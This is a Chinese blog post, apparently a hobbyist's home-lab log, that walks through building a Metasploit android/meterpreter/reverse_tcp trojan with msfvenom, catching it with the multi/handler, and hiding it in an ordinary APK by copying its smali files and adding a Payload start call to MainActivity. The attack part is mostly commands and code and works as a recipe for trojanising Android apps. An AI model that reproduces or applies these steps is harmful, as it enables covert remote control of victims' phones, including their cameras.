起因
昨天写了个hello world apk,今天突然想,能不能在里边注入小马子玩玩,说干就干,不务正业的我又开始啦
工具
kali(我装在VM里) apktool Java环境(Windows) 同一局域网(还不会内网穿透,所以先在自家局域网玩玩)
基础
反编译,签名(前几天的博客有写,用到的这两个步骤在本篇就不细讲了)
我们着重写下面的步骤:
开始
先生成个木马,输入
msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx(你的kali的IP地址) LPORT=5555 R>/root/m.apk(也有可能由于没有安装msf而进入失败,输入这个命令安装就好apt install metasploit-framework)
先测试木马能不能用,所以给手机安装上apk,并在kali上及进入msf控制台(直接输入msfconsole)
然后进入模块:
use exploit/multi/handler
开始设置参数:
set payload android/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx(生成木马时的ip,也是kali的ip)
set LPORT xxxx(生成木马时写的端口)
开始执行:
run(或者exploit)
结果如下图
手机打开木马后(注意虚拟机接网要用桥接模式,否则会使kali与手机不再局域网内,然后打开木马也没有,只会一直卡在Start reverse TCP handler on xx.xx.xx.xx这一步),成功的话如下图
然后就可以各种操作了
(拍照成功的话会自动打开浏览器显示照片,在这里没有截图下来)
退出输入exit就可
好!看来马子能用,下面的问题就是怎么把这个马子加到前天写的apk上(可能细心的有缘人看了会问,为什么开头是“昨天”,现在却是“前天”,——因为我写这个花了两天)
。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
气死我了,到现在还是没有成功,希望大佬路过可以指点一下
经过各种抱大佬大腿,终于找到个方法(虽然有点点小瑕疵),好我们开始
步骤
把木马加入到hello world.apk中
先反编译 m.apk与hello world.apk
然后进入木马的smali\com\metasploit\stage路径,找到一堆*.smali文件,把它们(除了MainActivity.smali)拷贝到hello world.apk的相同路径的文件下
然后打开其中的MainActivity.smali文件
在那个位置添加一行
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
如下:
然后再打开AndroidManifest.xml文件添加权限,最后打包签名即可(这些步骤之前有写,现在略过)
手机安装以后的效果跟上文一样